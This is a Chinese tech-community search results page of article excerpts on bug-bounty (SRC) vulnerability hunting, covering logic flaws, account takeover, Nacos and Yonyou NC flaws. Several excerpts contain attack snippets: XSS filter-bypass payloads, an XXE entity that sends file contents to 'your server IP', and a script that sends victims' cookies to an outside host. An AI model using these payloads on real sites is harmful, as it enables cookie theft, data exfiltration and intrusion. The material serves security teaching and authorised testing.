首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Khan安全团队

    SRC漏洞

    PROPFIND 漏洞是与 WebDAV(Web Distributed Authoring and Versioning) 协议相关的一种安全漏洞,主要涉及 HTTP 方法 PROPFIND 的不当实现或配置 PROPFIND 漏洞的原理 漏洞通常由以下原因引发: 不安全的配置服务器未正确限制 PROPFIND 方法的访问权限。 目录遍历漏洞攻击者可能通过 PROPFIND 请求访问本应受限的目录或文件(例如通过 Depth: infinity 参数递归遍历目录)。 漏洞的影响 敏感信息泄露攻击者可获取服务器上的文件列表、目录结构或其他元数据。 权限绕过通过遍历目录访问受限文件(如配置文件、日志文件)。 服务器入侵结合其他漏洞(如文件上传漏洞),可能导致远程代码执行(RCE)。 服务中断通过 DoS 攻击使服务器无法响应正常请求。

    70210编辑于 2025-04-04
  • 来自专栏红队蓝军

    SRC漏洞挖掘经验分享

    ENTITY % xxe SYSTEM 'http://你服务器IP/%file;'>">CSRF与逻辑漏洞的组合拳登录上后修改密保(忘记密码时通过回答问题来修改密码)进行抓包尝试用GET请求来代替 =1这种明显是问题与答案,那么x=MTIzNA==是什么呢MTIzNA==显然是base64编码后的结果,解码发现是1234,应该是用来进行身份验证的,不同用户的x值不同幸好发现了一个页面存在水平越权漏洞 也就是探究网站识别用户IP的方式是什么简单试了一下添加XFF请求头,X-Forwarded-For: <script>alert(1);</script>先故意输入错误的密码,然后去掉XFF请求头正常登录成功弹框,验证了漏洞存在 被编码了添加一个链接然后发表,并进行抓包将href值修改为javascript:alert(1);成功弹框,也就是说有些标签的<>不会被编码再找一个绕过方式添加一个图片然后发表,并进行抓包修改为<img src =1 onerror="alert(1);"/>结果并没有出现弹框,查看前端代码,onerror被替换为空了<img src=1 ="alert(1);"/>尝试双写绕过onerroonerrorr,让中间的

    1.7K20编辑于 2023-09-13
  • 来自专栏HACK学习

    SRC逻辑漏洞挖掘浅谈

    1.资产收集 1.1业务范围 巧用搜索引擎首推谷歌查看了解SRC旗下涉及到的业务,收集其对应的业务下的域名,再进一步进行挖掘,如: ? ? 整理,再进行常规资产收集 ? 、域名: a)网站源码涉及到的子域名ur接口资产爬取 b)网站源码js中包含的请求或拼接的访问接口 c高级功能)url接口中json信息泄漏识别 备注:该部分的具体内容将在下一篇文章【谈js静态文件在漏洞挖掘中的利用 3.逻辑漏洞 任意用户注册、密码重置、密码找回 3.1本地验证、修改返回包 1)获取验证码后任意输入一个验证码 ? 2)抓包放行,得到的返回包如下 ? 密码重置时删除mobilephone参数值修改email参数值 假如找回需要4部,最后一部有user参数,用自己账号正常到第三部,第四部修改user实现 4.支付逻辑漏洞 5.步骤,可跳过步骤 酒店..

    4.5K23发布于 2019-08-05
  • 来自专栏红队蓝军

    SRC漏洞挖掘经验分享

    ENTITY % xxe SYSTEM 'http://你服务器IP/%file;'>"> CSRF与逻辑漏洞的组合拳 登录上后修改密保(忘记密码时通过回答问题来修改密码)进行抓包 尝试用 这种明显是问题与答案,那么x=MTIzNA==是什么呢 MTIzNA==显然是base64编码后的结果,解码发现是1234,应该是用来进行身份验证的,不同用户的x值不同 幸好发现了一个页面存在水平越权漏洞 的方式是什么 简单试了一下添加XFF请求头,X-Forwarded-For: <script>alert(1);</script> 先故意输入错误的密码,然后去掉XFF请求头正常登录 成功弹框,验证了漏洞存在 添加一个链接然后发表,并进行抓包 将href值修改为javascript:alert(1); 成功弹框,也就是说有些标签的<>不会被编码 再找一个绕过方式 添加一个图片然后发表,并进行抓包 修改为<img src =1 onerror="alert(1);"/> 结果并没有出现弹框,查看前端代码,onerror被替换为空了<img src=1 ="alert(1);"/> 尝试双写绕过onerroonerrorr

    71321编辑于 2023-09-05
  • 来自专栏HACK学习

    SRC漏洞挖掘经验+技巧篇

    ),这些漏洞的测试方法本身不是特别复杂,一般混迹在安全圈子的人都能复现漏洞。 1、域名信息收集 src一般都只收对应的漏洞,很多src的公告里面就会明确范围;然后我们就需要根据这些范围来确定域名。 如果src上面没有给出范围,那么需要我们去搜集,你需要知道哪些domain是该公司的,主要通过手工来查看: 网站的关于页面/网站地图 whois反查 一些网站里面的跳转请求(也可以关注一下app) 其实这方面的文章很少,几个原因: 大家会觉得就是经验,玩多了就自然会了,教不了什么; 这种分享经验特别不好写,到现在也不知道我写了什么,其实都是一个思路点; 懒,不愿意……肯定都有一定的原因; 建议: src 四、安全漏洞相关的概念 安全漏洞的定义 我们经常听到漏洞这个概念,可什么是安全漏洞?想给它一个清晰完整的定义其实是非常困难的。

    12.4K61发布于 2019-08-06
  • 来自专栏湛卢工作室

    SRC漏洞挖掘实用技巧

    0x04 短信&邮件轰炸绕过 在网站测试的过程中,常常在用户注册登录时出现手机号/邮箱注册,这里就可能出现短信&邮件炸弹漏洞,此类漏洞测试比较方便,虽然有的站点做了防护,但也有一些绕过的办法。 0x05 逻辑漏洞 随着开发人员安全意识的日益加强,IPS/IDS、WAF、全流量检测等防护设备的不断部署,传统的SQL注入漏洞、命令执行等漏洞正变得越来越少,或者越来越难挖(需要绕过各种防御设备)。 但业务逻辑漏洞几乎可以bypass一切传统的安全防护设备,目前还没有非常有效的防御手段。 同时,业务逻辑纷繁复杂,再资深的程序员也可能挖坑,所以只要基础扎实,逻辑思维能力强,耐心细心,不放过任何一个步骤,此类漏洞比较容易挖。 ? 漏洞挖掘中应遵守SRC中的相关规则。

    4K30发布于 2019-11-20
  • 来自专栏FreeBuf

    逻辑漏洞小结之SRC

    最近在挖各大src,主要以逻辑漏洞为主,想着总结一下我所知道的一些逻辑漏洞分享一下以及举部分实际的案例展示一下,方便大家理解。 主要从两个方面看,业务方面与漏洞方面。 上面这个属于利用了burp中的intruder插件遍历了差数,导致短信漏洞产生。遍历几个参数设置好payloads即可,具体看图操作。我个人来说特别喜欢测各种各样的短信漏洞。 另外在注册名字的窗口处也可以插入xss,虽然危害小,但是你可以找找其他漏洞,打组合拳也说不定哦! ? 该漏洞被归为缓冲过度读取。缓冲过度读取错误是软件可以读取比应该被允许还多的数据。 其实首先的话还是需要给原理明白以及操作的思路弄懂,学会变通才可以挖到更多新型逻辑漏洞 一些挖src逻辑的骚操作下期抽时间写一下,案例可以私聊我找我要漏洞报告 如有写的不正确处,望大佬斧正。谢谢!

    2.5K42发布于 2020-03-03
  • 来自专栏闪石星曜CyberSecurity

    SRC混子的漏洞挖掘之道

    ,全资子公司,网站域名、手机app,微信小程序,企业专利品牌信息,企业邮箱,电话等等,对于很多万人挖的src来说,你收集到了别人没有收集过的资产,往往离挖到漏洞就不远了。 (找到一些平常收集不到的资产) PS:一般来说100%的全资子公司src漏洞是一定会收的,其他子公司资产可能需要与src审核沟通(扯皮)。 ---- 刚开始挖src往往不知道从哪下手,首先我们其实可以从各个src平台提交漏洞下拉框里看一看收取的漏洞类型。 然后针对性的去学习如何挖掘,比如智联招聘src收取的漏洞类型,我们就可以针对性的学习对应的挖掘技巧。 2.打漏洞组合拳的能力 SRC对于漏洞评级主要是看你漏洞可以造成的危害,所以当挖到一些低危漏洞时,可以先不急着提交,找一找有没有其他可以利用的点打漏洞组合拳。 3.绕waf的能力 这个能力挺欠缺的。

    4.4K23发布于 2021-01-11
  • 来自专栏渗透测试教程

    src漏洞的批量挖掘分享

    ¶前言 本篇博文只谈漏洞的利用和批量挖掘。 在接触src之前,我和很多师傅都有同一个疑问,就是那些大师傅是怎么批量挖洞的? ¶漏洞举例 这里以前几天爆出来的用友nc的命令执行漏洞为例 http://x.x.x.x/servlet//~ic/bsh.servlet.BshServlet 文本框里可以命令执行 ‍ ¶漏洞的批量检测 在知道这个漏洞详情之后,我们需要根据漏洞的特征去fofa里寻找全国范围里使用这个系统的网站,比如用友nc在fofa的搜索特征就是 app="用友-UFIDA-NC" 可以看到一共有9119条结果,接下来我们需要采集所有站点的地址下来 txt文件 ¶域名和权重的批量检测 在我们提交补天等漏洞平台时,不免注意到有这么一个规则,公益漏洞的提交需要满足站点的百度权重或者移动权重大于等于1,亦或者谷歌权重大于等于3的条件,补天漏洞平台以爱站的检测权重为准 最后就是一个个拿去提交漏洞了 ¶结尾 文中所写脚本还处于勉强能用的状态,后续会进行优化更改。

    2K40编辑于 2022-12-01
  • 来自专栏红蓝对抗

    SRC挖掘|任意用户登录漏洞挖掘思路

    任意用户登录漏洞以利用漏洞利用难度低、危害高、奖金高已经成为src/众测漏洞挖掘中的香饽饽,本文将分享一下众测/src中任意用户登录漏洞的挖掘思路。 任意用户登录漏洞挖掘思路前言任意用户登录漏洞以利用漏洞利用难度低、危害高、奖金高已经成为src/众测漏洞挖掘中的香饽饽,本文将分享一下众测/src中任意用户登录漏洞的挖掘思路。 便可以登录其他用户输入自己的手机号抓包,将手机字段后面加一个逗号或者分号后再加一个手机号,或者双写手机号字段phone=13333333333&phone=18888888888,当两个手机号均收到一个验证码时大概率漏洞存在 端点往往会记录用户的会话信息,若发现spring未授权访问且存在类似端点可以访问的话,可尝试获取用户凭证进行登录duriddruid的session监控若发现有效的会话信息时,可以通过此登录任意用户,将druid的未授权中危漏洞提升至高危 在信息查询的阶段过早返回了sessionid,导致任意用户登录3.逻辑漏洞导致的任意用户登录3.1 登录完全依赖数据包中的参数且参数可控最常规的任意用户登录漏洞,常见于两步/多步登录的登录逻辑处以两步登录为例

    3K11编辑于 2023-11-24
  • 来自专栏FreeBuf

    SRC漏洞挖掘信息收集与挖掘技巧

    这方面的信息收集能够帮助我们在漏洞利用时构造一些参数值或是进行暴力破解等等。 漏洞挖掘小技巧 F12、查看源文件大法 ? ? ? 在漏洞挖掘时可以多多查看“源文件”,越来越多的站点使用webpack进行打包会导致接口暴露等信息暴露,看似比较乱的js通过js格式化就能很好的进行阅读发现问题。 F12大法可以发现页面在打开时有没有请求一些接口,访问接口路径构造敏感页面进行漏洞探测。 例如:添加swagger-ui.html 可以访问到swagger服务。 总结 1.挖掘SRC漏洞时,对于子域名的收集至关重要,子域名的多少决定了漏洞的产出。 2.在进行信息收集时尽可能的做到全面,这样能最大限度上获取到子域名。 3.进行漏洞挖掘时要细心,JS中蕴藏着宝藏。 *本文作者:HONGSON,来自FreeBuf.COM

    1.7K20发布于 2020-06-16
  • 来自专栏网络安全自修室

    小白快速上手 SRC漏洞挖掘科普攻略!

    那么,作为一个网安小白如果想要入门SRC漏洞挖掘,需要掌握哪些知识呢?以下是本人通过多年从事网络安全工作的经验,综合网络上已有的资料,总结得出的指导SRC漏洞挖掘入门的详细介绍。 二、SRC漏洞挖掘的流程 1、了解漏洞类型 在开始SRC漏洞挖掘前,首先需要掌握常见的漏洞类型,包括XSS漏洞、SQL注入漏洞、文件上传漏洞、逻辑漏洞等等。 4、手动挖掘漏洞 手动挖掘漏洞SRC漏洞挖掘中的重要环节,它可以深入到网站代码层面,探测出漏洞,提高SRC漏洞挖掘的效率和准确性。 2、主动报告漏洞 如果在SRC漏洞挖掘中发现了漏洞,应该主动报告给网站管理员或漏洞报告平台,以保护用户和网站的安全。 4、持续学习 SRC漏洞挖掘是一项不断学习和提高技能的过程,需要持续学习和积累经验,关注新的安全漏洞 攻击技术 5、合理规划时间 SRC漏洞挖掘需要一定的时间和精力,需要合理规划时间和任务,避免过于疲劳影响挖掘效果

    4.1K10编辑于 2023-12-20
  • 来自专栏/root

    Web渗透思路及src漏洞挖掘思路

    漏洞挖掘思路 简介:安全应急响应中心(src) 大型企业的业务模式多,涉及的产品也多,特别是互联网业务讲究小步快跑敏捷迭代",往往忽视了安全检查或者来不及进行细致的安全检查,同时安全系统本身是程序也会存在各种遗漏 既然漏洞被外部发现不可避免,那么该如何吸引外部安全力量规范地参与进来呢?那么企业就推出安全应急响应中心简称就是为src.也可以吧他理解为企业的互联网资产。也就是企业网站,app等等。 src漏洞挖掘也就是在企业资产中发现漏洞提交给企业从而赚取赏金或者礼品。 src漏洞提交平台 漏洞盒子 补天 火绒安全平台 同舟共测-企业安全响应联盟 雷神众测 CNCERT工业互联网安全测试平台 综合平台:https://sec.cafe/links/? type=src 六、教育src挖掘 提交平台:https://src.sjtu.edu.cn/ 挖掘规则:https://src.sjtu.edu.cn/introduction/ 挖掘方法: 常规测试

    80110编辑于 2025-09-28
  • 来自专栏红蓝对抗

    Src挖掘技巧分享 | 谈谈业务逻辑漏洞

    本文首发于奇安信攻防社区 原文链接:https://forum.butian.net/share/1453 谈谈业务逻辑漏洞 业务逻辑漏洞简介 业务逻辑漏洞,是由于程序逻辑不严谨或逻辑太过复杂,导致一些逻辑分支不能正常处理或处理错误 ,这样的漏洞统称为业务逻辑漏洞。 简单理解:就是编程人员的思维逻辑不够严谨导致攻击者有机可乘的漏洞 逻辑漏洞还是一种虽然没有在owasp top10 中提及到,但是往往会存在的漏洞。 好像一名隐士,大隐隐于市,然而造成的破坏可能一点不比sql注入,xss等漏洞小。如下是逻辑漏洞的top10挖掘方向: 根据漏洞出现位置来总结 逻辑漏洞大概出现在如下几处。 越权漏洞常见位置 修改、重置、找回其他账户密码 查看、修改其他账户未公开的信息,例如个人资料、文件、数据、程序等 与账户关联的权限操作 0x02 越权访问漏洞的两大分类 越权漏洞主要分为水平越权和垂直越权两大类

    3.8K21编辑于 2022-06-30
  • 来自专栏HACK学习

    SRC逻辑漏洞挖掘详解以及思路和技巧

    通过指定的名称'img'创建img元素 var img = document.createElement('img'); img.width = 0; img.height = 0; //将img元素的src 属性指向脚本文件ReflectiveXSS.php //将cookie信息的字符串作为URI组件进行编码,然后用victimcookie参数传递 img.src = 'http://192.168.114.1 method=unknownmethod<script src=http://192.168.114.1/safedog-attack/ReflectiveXSS.js></script> 出现XSS漏洞的地方 越权漏洞是Web应用程序中一种常见的安全漏洞。 其他资料 业务逻辑漏洞总结 https://github.com/PyxYuYu/MyBlog/issues/102 JSRC——业务逻辑漏洞挖掘 JSRC——交易支付漏洞挖掘 JSRC——Web漏洞之逻辑漏洞挖掘

    6.9K11发布于 2020-02-26
  • 来自专栏黑战士安全

    SRC漏洞挖掘-从零到1的历程记录

    差不多从一个月之前开始尝试挖洞,因为有HR问过我挖没挖过SRC,让我很在意,所以就加入了挖SRC的行列。 1.如何起步 其他大佬也总结过,首先就是各种信息收集,再查各种旁站来测试,这里就一笔带过。 都有破解版了,网上一找就有,扫描的结果也比较全(但是误报很多) 如AWVS,但下面的SQL注入都是误报,甚至%100的洞也有误报可能,因此还是需要手动确认(但我同学也扫到过真的struct2 RCE高危漏洞 ,这种情况还是看运气了) APPScan的功能类似AWVS,一般扫描的时间要更长 Xray和BBScan都是轻量的快速扫描软件,适合扫敏感信息和普通漏洞 以上软件除了BBScan,其他都能生成漏洞报告 但是广撒网不一定钓得到鱼,理解漏洞原理还是很重要的,到后期一个burpsuite就够用了。 现在页面被管理员删除了,就贴个图看看吧 正如学校大佬所说,挖洞是个漫长的路,半途而废是挖不到漏洞的。希望在未来再接再厉。 有一说一,黑盒测试的本质还是信息收集。

    6.2K11发布于 2021-10-31
  • 来自专栏F12sec

    某企业SRC的Alibaba Nacos 认证绕过漏洞实战

    0x00漏洞背景 nacos的认证绕过安全漏洞,在nacos开启了鉴权后,依然能绕过鉴权访问任何http接口。 0x01漏洞详情 下面这个文章原理以及代码讲的很清楚,想要深入了解的同学可以看一看。 https://javazhiyin.blog.csdn.net/article/details/112791481 阿里 Nacos 惊爆,安全漏洞以绕过身份验证(附修复建议) 0x02漏洞影响范围 Nacos <= 2.0.0-ALPHA.1 Nacos < 1.4.1 0x03漏洞实战复现(某企业SRC) 前天心血来潮在整理某SRC资产的时候,突然发现这样一个熟悉的登陆系统 看到这个系统 ,突然想起了上次爆出的 Alibaba Nacos权限认证绕过漏洞 于是抱着试试的想法,根据漏洞文章复现了一下, 首先,对以下接口进行post请求,即可绕过权限认证,创建一个以test为用户名,test

    1.8K10编辑于 2022-09-29
  • 来自专栏渗透云笔记

    SRC漏洞挖掘之边界渗透中的小技巧

    案例分享一 四月份的时候Github有一个项目名为:openXXXX 我在其中发现了多个内部域名,最后通过 这些内部域名,结合接下来要讲的方法, 成功发现了多个漏洞。 ? 通过JS接口收集 通过Github信息泄露 2.业务强关联子公司资产收集 多级域名资产 Github信息泄露 员工信息、管理后台 3.目标IP资产、内网域名收集 线上测试环境 Github信息泄露 历史漏洞信息 漏洞原理 需要用到的知识点:懂点网站搭建,大概了解DNS解析过程 如果管理员在配置apache或nginx的时候 禁止了IP访问,那么我们直接访问IP将会回显403页面。 ?

    4.6K32发布于 2020-02-26
  • 来自专栏OneTS安全团队

    SRC实战篇-还在交Druid的低危漏洞

    OneTS安全团队 这里是一群热爱信安、专注网络安全的伙伴们,你将看到团队成员的原创技术文章,包含:SRC技巧、攻防实战经验、CTF、漏洞分析、逆向分析、钓鱼、免杀、云原生等信安知识。

    76710编辑于 2025-06-10
  • 来自专栏HACK学习

    一个5K RMB奖励的SRC漏洞

    在挖一些SRC漏洞的时候需要时刻保持敏感的状态,特别是在企业上线新业务,或者一些新漏洞爆发的时候,这些新漏洞可能是官方都未提供补丁的0day,或者刚被公布细节的1day等。 由于官方并没有给出该漏洞的升级补丁,所以该漏洞算得上一个0day了。 ---- 本地复现该漏洞并证实了命令执行的可能性后,立马找了一些SRC的站点来进行测试。 当时验证漏洞是利用了dnslog进行数据外带来进行测试的,在发现漏洞后,执行了个反弹shell的操作,然后就把利用过程的详细信息提交了他们SRC。 在提交SRC后,没一会就收到了他们的反馈邮件信息。 在和SRC沟通了该漏洞的一些详细细节以及修复方式后,他们为这单个漏洞也奖励了我5000 rmb ,也算非常厚道了。 ? 总结: 在一些新漏洞爆发时,如果赶在SRC业务方修复该漏洞前进行测试利用,很有可能会带给你惊喜 提前收集好SRC的资产信息,在新漏洞出来时,会大大增加你漏洞挖掘的速度和效率 需要在日常提升自己进行批量化漏洞挖掘的能力

    2.2K20发布于 2019-11-04
领券